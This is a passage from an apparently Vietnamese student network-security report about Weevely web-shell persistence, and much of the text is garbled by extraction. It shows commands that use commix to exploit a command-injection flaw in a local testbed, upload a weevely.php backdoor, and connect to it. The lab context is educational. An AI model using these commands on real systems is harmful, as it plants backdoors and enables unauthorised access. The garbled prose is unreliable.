Nhật ký Apache

Một phần của tài liệu HỌC PHẦN: AN TOÀN MẠNG BÁO CÁO CUỐI KỲ Đề tài: Tìm hiểu duy trì đăng nhập và công cụ Weevely (Trang 67 - 69)

N u chúng ta thoát ra kh i nh t ký lỗi và chạy ls -l, chúng ta sẽ thấy rằng t mục thuộc sở hữu c a root. Mặc dù mình khơng khun bạn nên s dụng tài kho n root ể sở hữu t mục ứng dụn w n n tron tr ng hợp này, nó n ăn n t t i lên t p qua lỗ hổng command injection, vì v y ó l ều cần l u ý k n t k m p n pháp phòng th sau này Quyền có thể ón một vai trị trong vi n ăn ặn các cuộc tấn ôn n n n ũn không nên là bi n pháp b o v duy nhất.

H y t y ổi các quyền n y ể chúng ta có thể th c hi n vi c t i t p lên v i câu l nh:

68

 chown -R www-data:www-data commix-testbed Bây gi , hãy chạy lại cuộc tấn công c a chúng ta:

 python3 commix.py --url="http://127.0.0.1:3000/commix-

testbed/scenarios/regular/GET/classic.php?addr=INJECT_HERE" --file- upload="/home/kali/Documents/weevely.php" --file-

dest="/var/www/example.com/public_html/commix- testbed/scenarios/regular/GET/"

Và chúng ta sẽ ạt ợc mụ í k t ôn o n y n lên: [info] The /var/www/example.com/public_html/commix-

testbed/scenarios/regular/GET/weevely.php file was uploaded successfully! C n t t i tác nhân backdoor c a mình lên máy ch và chúng ta có thể xác minh bằng Pseudo-terminal:

 ls weevely.php

Bước 3: Kết nối với tác nhân backdoor

Sau khi t i lên tác nhân backdoor, chúng ta có thể th c thi t p l nh bằng Weevely từ h th ng c a mình:

 weevely http://127.0.0.1:3000//commix-

testbed/scenarios/regular/GET/weevely.php commix

69

Một phần của tài liệu HỌC PHẦN: AN TOÀN MẠNG BÁO CÁO CUỐI KỲ Đề tài: Tìm hiểu duy trì đăng nhập và công cụ Weevely (Trang 67 - 69)

Tải bản đầy đủ (PDF)

(72 trang)